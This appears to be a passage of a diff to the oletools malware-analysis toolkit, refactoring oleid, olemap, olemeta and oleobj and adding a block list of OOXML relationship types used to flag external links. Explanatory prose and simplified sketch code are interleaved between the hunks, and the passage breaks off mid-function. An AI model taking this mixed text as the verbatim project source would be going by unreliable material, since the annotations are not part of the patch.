+# 2018-10-19 CH: - accept olefile as well as filename, return Indicators,
+# improve encryption detection for ppt
-__version__ = '0.51'
+__version__ = '0.54'
#------------------------------------------------------------------------------
@@ -76,7 +80,10 @@
#=== IMPORTS =================================================================
-import optparse, sys, os, re, zlib, struct
+import argparse, sys, re, zlib, struct, os
+from os.path import dirname, abspath
+
+import olefile
# IMPORTANT: it should be possible to run oletools directly as scripts
# in any directory without installing them with pip or setup.py.
@@ -87,17 +94,17 @@
# print('_thismodule_dir = %r' % _thismodule_dir)
_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
# print('_parent_dir = %r' % _thirdparty_dir)
-if not _parent_dir in sys.path:
+if _parent_dir not in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty import olefile
from oletools.thirdparty.prettytable import prettytable
+from oletools import crypto
#=== FUNCTIONS ===============================================================
-def detect_flash (data):
+def detect_flash(data):
"""
Detect Flash objects (SWF files) within a binary string of data
return a list of (start_index, length, compressed) tuples, or [] if nothing
@@ -117,7 +124,7 @@ def detect_flash (data):
# Read Header
header = data[start:start+3]
# Read Version
- ver = struct.unpack('<b', data[start+3])[0]
+ ver = struct.unpack('<b', data[start+3:start+4])[0]
# Check version
if ver > 20:
@@ -139,7 +146,7 @@ def detect_flash (data):
compressed_data = swf[8:]
try:
zlib.decompress(compressed_data)
- except:
+ except Exception:
continue
# else we don't check anything at this stage, we only assume it is a
# valid SWF. So there might be false positives for uncompressed SWF.
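`detect_flash()` above scans stream data for the SWF magic bytes (`FWS` for uncompressed, `CWS` for compressed files) and, for compressed candidates, verifies that the body actually inflates with zlib. A simplified sketch of that idea (it omits the version check and header parsing the real function performs):

```python
import re
import zlib

# Simplified sketch: find SWF magic bytes, and for compressed ('CWS')
# candidates, keep only those whose body decompresses cleanly.
def find_swf(data):
    found = []
    for match in re.finditer(b'[FC]WS', data):
        start = match.start()
        compressed = data[start:start + 1] == b'C'
        if compressed:
            try:
                # zlib-compressed payload starts after the 8-byte header
                zlib.decompress(data[start + 8:])
            except Exception:
                continue
        found.append((start, compressed))
    return found

# Build a fake compressed SWF: 'CWS' + version byte + 4 length bytes + zlib body
body = zlib.compress(b'fake swf body')
blob = b'junk' + b'CWS' + b'\x0a' + b'\x00' * 4 + body
print(find_swf(blob)[0])  # (4, True)
```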
@@ -150,9 +157,15 @@ def detect_flash (data):
#=== CLASSES =================================================================
-class Indicator (object):
+class Indicator(object):
+ """
+ Piece of information of an :py:class:`OleID` object.
+
+ Contains an ID, value, type, name and description. No other functionality.
+ """
- def __init__(self, _id, value=None, _type=bool, name=None, description=None):
+ def __init__(self, _id, value=None, _type=bool, name=None,
+ description=None):
self.id = _id
self.value = value
self.type = _type
@@ -162,21 +175,55 @@ def __init__(self, _id, value=None, _type=bool, name=None, description=None):
self.description = description
-class OleID:
+class OleID(object):
+ """
+ Summary of information about an OLE file
- def __init__(self, filename):
- self.filename = filename
+ Call :py:meth:`OleID.check` to gather all info on a given file or run one
+ of the `check_` functions to just get a specific piece of info.
+ """
+
+ def __init__(self, input_file):
+ """
+ Create an OleID object
+
+ This does not run any checks yet nor open the file.
+
+ Can either give just a filename (as str), so OleID will check whether
+ that is a valid OLE file and create a :py:class:`olefile.OleFileIO`
+ object for it. Or you can give an already opened
+ :py:class:`olefile.OleFileIO` as argument to avoid re-opening (e.g. if
+ called from other oletools).
+
+ If filename is given, only :py:meth:`OleID.check` opens the file. Other
+ functions will return None
+ """
+ if isinstance(input_file, olefile.OleFileIO):
+ self.ole = input_file
+ self.filename = None
+ else:
+ self.filename = input_file
+ self.ole = None
self.indicators = []
+ self.suminfo_data = None
def check(self):
+ """
+ Open file and run all checks on it.
+
+ :returns: list of all :py:class:`Indicator`s created
+ """
# check if it is actually an OLE file:
oleformat = Indicator('ole_format', True, name='OLE format')
self.indicators.append(oleformat)
- if not olefile.isOleFile(self.filename):
+ if self.ole:
+ oleformat.value = True
+ elif not olefile.isOleFile(self.filename):
oleformat.value = False
return self.indicators
- # parse file:
- self.ole = olefile.OleFileIO(self.filename)
+ else:
+ # parse file:
+ self.ole = olefile.OleFileIO(self.filename)
# checks:
self.check_properties()
self.check_encrypted()
@@ -184,140 +231,241 @@ def check(self):
self.check_excel()
self.check_powerpoint()
self.check_visio()
- self.check_ObjectPool()
+ self.check_object_pool()
self.check_flash()
self.ole.close()
return self.indicators
- def check_properties (self):
- suminfo = Indicator('has_suminfo', False, name='Has SummaryInformation stream')
+ def check_properties(self):
+ """
+ Read summary information required for other check_* functions
+
+ :returns: 2 :py:class:`Indicator`s (for presence of summary info and
+ application name) or None if file was not opened
+ """
+ suminfo = Indicator('has_suminfo', False,
+ name='Has SummaryInformation stream')
self.indicators.append(suminfo)
- appname = Indicator('appname', 'unknown', _type=str, name='Application name')
+ appname = Indicator('appname', 'unknown', _type=str,
+ name='Application name')
self.indicators.append(appname)
- self.suminfo = {}
- # check stream SummaryInformation
+ if not self.ole:
+ return None, None
+ self.suminfo_data = {}
+ # check stream SummaryInformation (not present e.g. in encrypted ppt)
if self.ole.exists("\x05SummaryInformation"):
suminfo.value = True
- self.suminfo = self.ole.getproperties("\x05SummaryInformation")
+ self.suminfo_data = self.ole.getproperties("\x05SummaryInformation")
# check application name:
- appname.value = self.suminfo.get(0x12, 'unknown')
-
- def check_encrypted (self):
+ appname.value = self.suminfo_data.get(0x12, 'unknown')
+ return suminfo, appname
+
+ def get_indicator(self, indicator_id):
+ """Helper function: returns an indicator if present (or None)"""
+ result = [indicator for indicator in self.indicators
+ if indicator.id == indicator_id]
+ if result:
+ return result[0]
+ else:
+ return None
+
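The `get_indicator()` helper above lets later checks correct an indicator that an earlier check already appended. A self-contained sketch of that pattern (a stripped-down `Indicator`, not the full class):

```python
# Sketch of the Indicator bookkeeping pattern used by OleID: checks append
# Indicator objects to a list, and get_indicator() finds them by id.
class Indicator(object):
    def __init__(self, _id, value=None, _type=bool, name=None,
                 description=None):
        self.id = _id
        self.value = value
        self.type = _type
        self.name = name
        self.description = description

indicators = []
indicators.append(Indicator('vba_macros', False, name='VBA Macros'))

def get_indicator(indicator_id):
    result = [ind for ind in indicators if ind.id == indicator_id]
    return result[0] if result else None

# A later check (e.g. for Excel) can correct an existing indicator:
macro_ind = get_indicator('vba_macros')
if macro_ind:
    macro_ind.value = True
print(get_indicator('vba_macros').value)  # True
```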
+ def check_encrypted(self):
+ """
+ Check whether this file is encrypted.
+
+ Might call check_properties.
+
+ :returns: :py:class:`Indicator` for encryption or None if file was not
+ opened
+ """
# we keep the pointer to the indicator, can be modified by other checks:
- self.encrypted = Indicator('encrypted', False, name='Encrypted')
- self.indicators.append(self.encrypted)
- # check if bit 1 of security field = 1:
- # (this field may be missing for Powerpoint2000, for example)
- if 0x13 in self.suminfo:
- if self.suminfo[0x13] & 1:
- self.encrypted.value = True
-
- def check_word (self):
- word = Indicator('word', False, name='Word Document',
- description='Contains a WordDocument stream, very likely to be a Microsoft Word Document.')
+ encrypted = Indicator('encrypted', False, name='Encrypted')
+ self.indicators.append(encrypted)
+ if not self.ole:
+ return None
+ encrypted.value = crypto.is_encrypted(self.ole)
+ return encrypted
+
+ def check_word(self):
+ """
+ Check whether this file is a word document
+
+ If this finds evidence of encryption, will correct/add encryption
+ indicator.
+
+ :returns: 2 :py:class:`Indicator`s (for word and vba_macro) or None if
+ file was not opened
+ """
+ word = Indicator(
+ 'word', False, name='Word Document',
+ description='Contains a WordDocument stream, very likely to be a '
+ 'Microsoft Word Document.')
self.indicators.append(word)
- self.macros = Indicator('vba_macros', False, name='VBA Macros')
- self.indicators.append(self.macros)
+ macros = Indicator('vba_macros', False, name='VBA Macros')
+ self.indicators.append(macros)
+ if not self.ole:
+ return None, None
if self.ole.exists('WordDocument'):
word.value = True
- # check for Word-specific encryption flag:
- s = self.ole.openstream(["WordDocument"])
- # pass header 10 bytes
- s.read(10)
- # read flag structure:
- temp16 = struct.unpack("H", s.read(2))[0]
- fEncrypted = (temp16 & 0x0100) >> 8
- if fEncrypted:
- self.encrypted.value = True
- s.close()
+
# check for VBA macros:
if self.ole.exists('Macros'):
- self.macros.value = True
+ macros.value = True
+ return word, macros
+
+ def check_excel(self):
+ """
+ Check whether this file is an excel workbook.
+
+ If this finds macros, will add/correct macro indicator.
- def check_excel (self):
- excel = Indicator('excel', False, name='Excel Workbook',
- description='Contains a Workbook or Book stream, very likely to be a Microsoft Excel Workbook.')
+ see also: :py:func:`xls_parser.is_xls`
+
+ :returns: :py:class:`Indicator` for excel or (None, None) if file was
+ not opened
+ """
+ excel = Indicator(
+ 'excel', False, name='Excel Workbook',
+ description='Contains a Workbook or Book stream, very likely to be '
+ 'a Microsoft Excel Workbook.')
self.indicators.append(excel)
+ if not self.ole:
+ return None
#self.macros = Indicator('vba_macros', False, name='VBA Macros')
#self.indicators.append(self.macros)
if self.ole.exists('Workbook') or self.ole.exists('Book'):
excel.value = True
# check for VBA macros:
if self.ole.exists('_VBA_PROJECT_CUR'):
- self.macros.value = True
-
- def check_powerpoint (self):
- ppt = Indicator('ppt', False, name='PowerPoint Presentation',
- description='Contains a PowerPoint Document stream, very likely to be a Microsoft PowerPoint Presentation.')
+ # correct macro indicator if present or add one
+ macro_ind = self.get_indicator('vba_macros')
+ if macro_ind:
+ macro_ind.value = True
+ else:
+ self.indicators.append(Indicator('vba_macros', True,
+ name='VBA Macros'))
+ return excel
+
+ def check_powerpoint(self):
+ """
+ Check whether this file is a powerpoint presentation
+
+ see also: :py:func:`ppt_record_parser.is_ppt`
+
+ :returns: :py:class:`Indicator` for whether this is a powerpoint
+ presentation or not or None if file was not opened
+ """
+ ppt = Indicator(
+ 'ppt', False, name='PowerPoint Presentation',
+ description='Contains a PowerPoint Document stream, very likely to '
+ 'be a Microsoft PowerPoint Presentation.')
self.indicators.append(ppt)
+ if not self.ole:
+ return None
if self.ole.exists('PowerPoint Document'):
ppt.value = True
-
- def check_visio (self):
- visio = Indicator('visio', False, name='Visio Drawing',
- description='Contains a VisioDocument stream, very likely to be a Microsoft Visio Drawing.')
+ return ppt
+
+ def check_visio(self):
+ """Check whether this file is a visio drawing"""
+ visio = Indicator(
+ 'visio', False, name='Visio Drawing',
+ description='Contains a VisioDocument stream, very likely to be a '
+ 'Microsoft Visio Drawing.')
self.indicators.append(visio)
+ if not self.ole:
+ return None
if self.ole.exists('VisioDocument'):
visio.value = True
+ return visio
+
+ def check_object_pool(self):
+ """
+ Check whether this file contains an ObjectPool stream.
+
+ Such a stream would be a strong indicator for embedded objects or files.
- def check_ObjectPool (self):
- objpool = Indicator('ObjectPool', False, name='ObjectPool',
- description='Contains an ObjectPool stream, very likely to contain embedded OLE objects or files.')
+ :returns: :py:class:`Indicator` for ObjectPool stream or None if file
+ was not opened
+ """
+ objpool = Indicator(
+ 'ObjectPool', False, name='ObjectPool',
+ description='Contains an ObjectPool stream, very likely to contain '
+ 'embedded OLE objects or files.')
self.indicators.append(objpool)
+ if not self.ole:
+ return None
if self.ole.exists('ObjectPool'):
objpool.value = True
-
-
- def check_flash (self):
- flash = Indicator('flash', 0, _type=int, name='Flash objects',
- description='Number of embedded Flash objects (SWF files) detected in OLE streams. Not 100% accurate, there may be false positives.')
+ return objpool
+
+ def check_flash(self):
+ """
+ Check whether this file contains flash objects
+
+ :returns: :py:class:`Indicator` for count of flash objects or None if
+ file was not opened
+ """
+ flash = Indicator(
+ 'flash', 0, _type=int, name='Flash objects',
+ description='Number of embedded Flash objects (SWF files) detected '
+ 'in OLE streams. Not 100% accurate, there may be false '
+ 'positives.')
self.indicators.append(flash)
+ if not self.ole:
+ return None
for stream in self.ole.listdir():
data = self.ole.openstream(stream).read()
found = detect_flash(data)
# just add to the count of Flash objects:
flash.value += len(found)
#print stream, found
+ return flash
#=== MAIN =================================================================
def main():
+ """Called when running this file as script. Shows all info on input file."""
# print banner with version
- print ('oleid %s - http://decalage.info/oletools' % __version__)
- print ('THIS IS WORK IN PROGRESS - Check updates regularly!')
- print ('Please report any issue at https://github.com/decalage2/oletools/issues')
- print ('')
+ print('oleid %s - http://decalage.info/oletools' % __version__)
+ print('THIS IS WORK IN PROGRESS - Check updates regularly!')
+ print('Please report any issue at '
+ 'https://github.com/decalage2/oletools/issues')
+ print('')
- usage = 'usage: %prog [options] '
- parser = optparse.OptionParser(usage=__doc__ + '\n' + usage)
-## parser.add_option('-o', '--ole', action='store_true', dest='ole', help='Parse an OLE file (e.g. Word, Excel) to look for SWF in each stream')
+ parser = argparse.ArgumentParser(description=__doc__)
+ parser.add_argument('input', type=str, nargs='*', metavar='FILE',
+ help='Name of files to process')
+ # parser.add_argument('-o', '--ole', action='store_true', dest='ole',
+ # help='Parse an OLE file (e.g. Word, Excel) to look for '
+ # 'SWF in each stream')
- (options, args) = parser.parse_args()
+ args = parser.parse_args()
# Print help if no arguments are passed
- if len(args) == 0:
+ if len(args.input) == 0:
parser.print_help()
return
- for filename in args:
+ for filename in args.input:
print('Filename:', filename)
oleid = OleID(filename)
indicators = oleid.check()
#TODO: add description
#TODO: highlight suspicious indicators
- t = prettytable.PrettyTable(['Indicator', 'Value'])
- t.align = 'l'
- t.max_width = 39
- #t.border = False
+ table = prettytable.PrettyTable(['Indicator', 'Value'])
+ table.align = 'l'
+ table.max_width = 39
+ table.border = False
for indicator in indicators:
#print '%s: %s' % (indicator.name, indicator.value)
- t.add_row((indicator.name, indicator.value))
+ table.add_row((indicator.name, indicator.value))
- print(t)
- print ('')
+ print(table)
+ print('')
if __name__ == '__main__':
main()
diff --git a/oletools/olemap.py b/oletools/olemap.py
index 6f8f51f1..fc6a8358 100644
--- a/oletools/olemap.py
+++ b/oletools/olemap.py
@@ -13,7 +13,7 @@
#=== LICENSE ==================================================================
-# olemap is copyright (c) 2015-2017 Philippe Lagadec (http://www.decalage.info)
+# olemap is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -51,9 +51,10 @@
# 2017-03-22 PL: - added extra data detection, completed header display
# 2017-03-23 PL: - only display the header by default
# - added option --exdata to display extra data in hex
+# 2018-08-28 v0.54 PL: - olefile is now a dependency
+# 2019-07-10 v0.55 PL: - fixed display of OLE header CLSID (issue #394)
-
-__version__ = '0.51'
+__version__ = '0.55'
#------------------------------------------------------------------------------
# TODO:
@@ -74,7 +75,7 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty.olefile import olefile
+import olefile
from oletools.thirdparty.tablestream import tablestream
from oletools.thirdparty.xglob import xglob
from oletools.ezhexviewer import hexdump3
@@ -121,7 +122,7 @@ def show_header(ole, extra_data=False):
print("OLE HEADER:")
t = tablestream.TableStream([24, 16, 79-(4+24+16)], header_row=['Attribute', 'Value', 'Description'])
t.write_row(['OLE Signature (hex)', binascii.b2a_hex(ole.header_signature).upper(), 'Should be D0CF11E0A1B11AE1'])
- t.write_row(['Header CLSID (hex)', binascii.b2a_hex(ole.header_clsid).upper(), 'Should be 0'])
+ t.write_row(['Header CLSID', ole.header_clsid, 'Should be empty (0)'])
t.write_row(['Minor Version', '%04X' % ole.minor_version, 'Should be 003E'])
t.write_row(['Major Version', '%04X' % ole.dll_version, 'Should be 3 or 4'])
t.write_row(['Byte Order', '%04X' % ole.byte_order, 'Should be FFFE (little endian)'])
diff --git a/oletools/olemeta.py b/oletools/olemeta.py
index 7ae8b3e6..61317460 100644
--- a/oletools/olemeta.py
+++ b/oletools/olemeta.py
@@ -15,7 +15,7 @@
#=== LICENSE =================================================================
-# olemeta is copyright (c) 2013-2017, Philippe Lagadec (http://www.decalage.info)
+# olemeta is copyright (c) 2013-2019, Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -49,8 +49,9 @@
# 2016-10-28 PL: - removed the UTF8 codec for console display
# 2017-04-26 v0.51 PL: - fixed absolute imports (issue #141)
# 2017-05-04 PL: - added optparse and xglob (issue #141)
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
#------------------------------------------------------------------------------
# TODO:
@@ -75,9 +76,10 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty import olefile
+import olefile
from oletools.thirdparty import xglob
from oletools.thirdparty.tablestream import tablestream
+from oletools.common.io_encoding import ensure_stdout_handles_unicode
#=== MAIN =================================================================
@@ -87,13 +89,12 @@ def process_ole(ole):
meta = ole.get_metadata()
# console output with UTF8 encoding:
- # It looks like we do not need the UTF8 codec anymore, both for Python 2 and 3
- console_utf8 = sys.stdout #codecs.getwriter('utf8')(sys.stdout)
+ ensure_stdout_handles_unicode()
# TODO: move similar code to a function
print('Properties from the SummaryInformation stream:')
- t = tablestream.TableStream([21, 30], header_row=['Property', 'Value'], outfile=console_utf8)
+ t = tablestream.TableStream([21, 30], header_row=['Property', 'Value'])
for prop in meta.SUMMARY_ATTRIBS:
value = getattr(meta, prop)
if value is not None:
@@ -110,7 +111,7 @@ def process_ole(ole):
print('')
print('Properties from the DocumentSummaryInformation stream:')
- t = tablestream.TableStream([21, 30], header_row=['Property', 'Value'], outfile=console_utf8)
+ t = tablestream.TableStream([21, 30], header_row=['Property', 'Value'])
for prop in meta.DOCSUM_ATTRIBS:
value = getattr(meta, prop)
if value is not None:
diff --git a/oletools/oleobj.py b/oletools/oleobj.py
index 1b54ccb5..8ed34f2d 100644
--- a/oletools/oleobj.py
+++ b/oletools/oleobj.py
@@ -1,10 +1,9 @@
#!/usr/bin/env python
-from __future__ import print_function
"""
oleobj.py
oleobj is a Python script and module to parse OLE objects and files stored
-into various file formats such as RTF or MS Office documents (e.g. Word, Excel).
+into various MS Office file formats (doc, xls, ppt, docx, xlsx, pptx, etc)
Author: Philippe Lagadec - http://www.decalage.info
License: BSD, see source code or documentation
@@ -13,33 +12,67 @@
http://www.decalage.info/python/oletools
"""
-# === LICENSE ==================================================================
+# === LICENSE =================================================================
-# oleobj is copyright (c) 2015-2017 Philippe Lagadec (http://www.decalage.info)
+# oleobj is copyright (c) 2015-2020 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
+# * Redistributions of source code must retain the above copyright notice,
+# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-
-#------------------------------------------------------------------------------
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+
+# -- IMPORTS ------------------------------------------------------------------
+
+from __future__ import print_function
+
+import logging
+import struct
+import argparse
+import os
+import re
+import sys
+import io
+from zipfile import is_zipfile
+
+import olefile
+
+# IMPORTANT: it should be possible to run oletools directly as scripts
+# in any directory without installing them with pip or setup.py.
+# In that case, relative imports are NOT usable.
+# And to enable Python 2+3 compatibility, we need to use absolute imports,
+# so we add the oletools parent folder to sys.path (absolute+normalized path):
+_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
+# print('_thismodule_dir = %r' % _thismodule_dir)
+_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
+# print('_parent_dir = %r' % _thirdparty_dir)
+if _parent_dir not in sys.path:
+ sys.path.insert(0, _parent_dir)
+
+from oletools.thirdparty import xglob
+from oletools.ppt_record_parser import (is_ppt, PptFile,
+ PptRecordExOleVbaActiveXAtom)
+from oletools.ooxml import XmlParser
+from oletools.common.io_encoding import ensure_stdout_handles_unicode
+
+# -----------------------------------------------------------------------------
# CHANGELOG:
# 2015-12-05 v0.01 PL: - first version
# 2016-06 PL: - added main and process_file (not working yet)
@@ -48,15 +81,21 @@
# 2016-11-17 v0.51 PL: - fixed OLE native object extraction
# 2016-11-18 PL: - added main for setup.py entry point
# 2017-05-03 PL: - fixed absolute imports (issue #141)
+# 2018-01-18 v0.52 CH: - added support for zipped-xml-based types (docx, pptx,
+# xlsx), and ppt
+# 2018-03-27 PL: - fixed issue #274 in read_length_prefixed_string
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2018-10-30 SA: - added detection of external links (PR #317)
+# 2020-03-03 v0.56 PL: - fixed bug #541, "Ole10Native" is case-insensitive
-__version__ = '0.51'
+__version__ = '0.56dev2'
-#------------------------------------------------------------------------------
+# -----------------------------------------------------------------------------
# TODO:
# + setup logging (common with other oletools)
-#------------------------------------------------------------------------------
+# -----------------------------------------------------------------------------
# REFERENCES:
# Reference for the storage of embedded OLE objects/files:
@@ -67,37 +106,29 @@
# TODO: oledump
-#--- IMPORTS ------------------------------------------------------------------
-
-import logging, struct, optparse, os, re, sys
-
-# IMPORTANT: it should be possible to run oletools directly as scripts
-# in any directory without installing them with pip or setup.py.
-# In that case, relative imports are NOT usable.
-# And to enable Python 2+3 compatibility, we need to use absolute imports,
-# so we add the oletools parent folder to sys.path (absolute+normalized path):
-_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
-# print('_thismodule_dir = %r' % _thismodule_dir)
-_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
-# print('_parent_dir = %r' % _thirdparty_dir)
-if not _parent_dir in sys.path:
- sys.path.insert(0, _parent_dir)
+# === LOGGING =================================================================
-from oletools.thirdparty.olefile import olefile
-from oletools.thirdparty.xglob import xglob
+DEFAULT_LOG_LEVEL = "warning"
+LOG_LEVELS = {'debug': logging.DEBUG,
+ 'info': logging.INFO,
+ 'warning': logging.WARNING,
+ 'error': logging.ERROR,
+ 'critical': logging.CRITICAL,
+ 'debug-olefile': logging.DEBUG}
-# === LOGGING =================================================================
class NullHandler(logging.Handler):
"""
Log Handler without output, to avoid printing messages if logging is not
configured by the main application.
Python 2.7 has logging.NullHandler, but this is necessary for 2.6:
- see https://docs.python.org/2.6/library/logging.html#configuring-logging-for-a-library
+ see https://docs.python.org/2.6/library/logging.html section
+ configuring-logging-for-a-library
"""
def emit(self, record):
pass
+
def get_logger(name, level=logging.CRITICAL+1):
"""
Create a suitable logger object for this module.
@@ -110,7 +141,7 @@ def get_logger(name, level=logging.CRITICAL+1):
# First, test if there is already a logger with the same name, else it
# will generate duplicate messages (due to duplicate handlers):
if name in logging.Logger.manager.loggerDict:
- #NOTE: another less intrusive but more "hackish" solution would be to
+ # NOTE: another less intrusive but more "hackish" solution would be to
# use getLogger then test if its effective level is not default.
logger = logging.getLogger(name)
# make sure level is OK:
@@ -124,8 +155,10 @@ def get_logger(name, level=logging.CRITICAL+1):
logger.setLevel(level)
return logger
+
# a global logger object used for debugging:
-log = get_logger('oleobj')
+log = get_logger('oleobj') # pylint: disable=invalid-name
+
def enable_logging():
"""
@@ -136,7 +169,7 @@ def enable_logging():
log.setLevel(logging.NOTSET)
-# === CONSTANTS ==============================================================
+# === CONSTANTS ===============================================================
# some str methods on Python 2.x return characters,
# while the equivalent bytes methods return integers on Python 3.x:
@@ -145,89 +178,184 @@ def enable_logging():
NULL_CHAR = '\x00'
else:
# Python 3.x
- NULL_CHAR = 0
+ NULL_CHAR = 0 # pylint: disable=redefined-variable-type
+ xrange = range # pylint: disable=redefined-builtin, invalid-name
+OOXML_RELATIONSHIP_TAG = '{http://schemas.openxmlformats.org/package/2006/relationships}Relationship'
-# === GLOBAL VARIABLES =======================================================
+# === GLOBAL VARIABLES ========================================================
# struct to parse an unsigned integer of 32 bits:
-struct_uint32 = struct.Struct('<L')
+STRUCT_UINT32 = struct.Struct('<L')
# struct to parse an unsigned integer of 16 bits:
-struct_uint16 = struct.Struct('<H')
+STRUCT_UINT16 = struct.Struct('<H')
+
+# max length of a zero-terminated ansi string
+STR_MAX_LEN = 1024
+
+# size of chunks to copy from ole stream to file
+DUMP_CHUNK_SIZE = 4096
+
+# return values from main; these are bit flags that can be added together
+# (e.g.: did dump but had err parsing and dumping: return 1+4+8 = 13)
+RETURN_NO_DUMP = 0 # nothing found to dump/extract
+RETURN_DID_DUMP = 1 # did dump/extract successfully
+RETURN_ERR_ARGS = 2 # reserve for OptionParser.parse_args
+RETURN_ERR_STREAM = 4 # error opening/parsing a stream
+RETURN_ERR_DUMP = 8 # error dumping data from stream to file
+
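The RETURN_* values above are bit flags, so several outcomes can be combined into a single process exit code and decoded individually by a caller. A minimal sketch (the flag values mirror the definitions above):

```python
# mirror of the RETURN_* flag values defined above
RETURN_NO_DUMP = 0     # nothing found to dump/extract
RETURN_DID_DUMP = 1    # did dump/extract successfully
RETURN_ERR_ARGS = 2    # reserved for argument-parsing errors
RETURN_ERR_STREAM = 4  # error opening/parsing a stream
RETURN_ERR_DUMP = 8    # error dumping data from stream to file

# combine outcomes with bitwise OR (same as adding distinct flags)
exit_code = RETURN_DID_DUMP | RETURN_ERR_STREAM | RETURN_ERR_DUMP
print(exit_code)                         # 13, i.e. 1 + 4 + 8

# a caller can test each outcome separately
assert exit_code & RETURN_ERR_STREAM     # a stream error occurred
assert not exit_code & RETURN_ERR_ARGS   # argument parsing was fine
```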
+# Not sure if they can all be "External", but just in case
+BLACKLISTED_RELATIONSHIP_TYPES = [
+ 'attachedTemplate',
+ 'externalLink',
+ 'externalLinkPath',
+ 'externalReference',
+ 'frame',
+ 'hyperlink',
+ 'officeDocument',
+ 'oleObject',
+ 'package',
+ 'slideUpdateUrl',
+ 'slideMaster',
+ 'slide',
+ 'slideUpdateInfo',
+ 'subDocument',
+ 'worksheet'
+]
+
+# === FUNCTIONS ===============================================================
+
+
+def read_uint32(data, index):
"""
Read an unsigned integer from the first 32 bits of data.
- :param data: bytes string containing the data to be extracted.
- :return: tuple (value, new_data) containing the read value (int),
- and the new data without the bytes read.
+ :param data: bytes string or stream containing the data to be extracted.
+ :param index: index to start reading from or None if data is stream.
+ :return: tuple (value, index) containing the read value (int),
+ and the index to continue reading next time.
"""
- value = struct_uint32.unpack(data[0:4])[0]
- new_data = data[4:]
- return (value, new_data)
+ if index is None:
+ value = STRUCT_UINT32.unpack(data.read(4))[0]
+ else:
+ value = STRUCT_UINT32.unpack(data[index:index+4])[0]
+ index += 4
+ return (value, index)
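The new signature serves both in-memory buffers and streams through the `index` argument: `index=None` selects the stream path, otherwise `data` is treated as a bytes buffer and the returned index points past the bytes consumed. A minimal sketch of this convention:

```python
import io
import struct

STRUCT_UINT32 = struct.Struct('<L')  # little-endian unsigned 32-bit integer

def read_uint32(data, index):
    """Read a uint32 from a bytes buffer (index is int) or stream (index is None)."""
    if index is None:
        value = STRUCT_UINT32.unpack(data.read(4))[0]   # stream keeps its own position
    else:
        value = STRUCT_UINT32.unpack(data[index:index + 4])[0]
        index += 4                                      # advance index for caller
    return value, index

buf = struct.pack('<LL', 0xCAFE, 0xBEEF)
print(read_uint32(buf, 0))                  # (51966, 4): buffer, index advances
print(read_uint32(io.BytesIO(buf), None))   # (51966, None): stream path
```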
-def read_uint16(data):
+def read_uint16(data, index):
"""
- Read an unsigned integer from the first 16 bits of data.
+ Read an unsigned integer from the 16 bits of data following index.
- :param data: bytes string containing the data to be extracted.
- :return: tuple (value, new_data) containing the read value (int),
- and the new data without the bytes read.
+ :param data: bytes string or stream containing the data to be extracted.
+ :param index: index to start reading from or None if data is stream
+ :return: tuple (value, index) containing the read value (int),
+ and the index to continue reading next time.
"""
- value = struct_uint16.unpack(data[0:2])[0]
- new_data = data[2:]
- return (value, new_data)
+ if index is None:
+ value = STRUCT_UINT16.unpack(data.read(2))[0]
+ else:
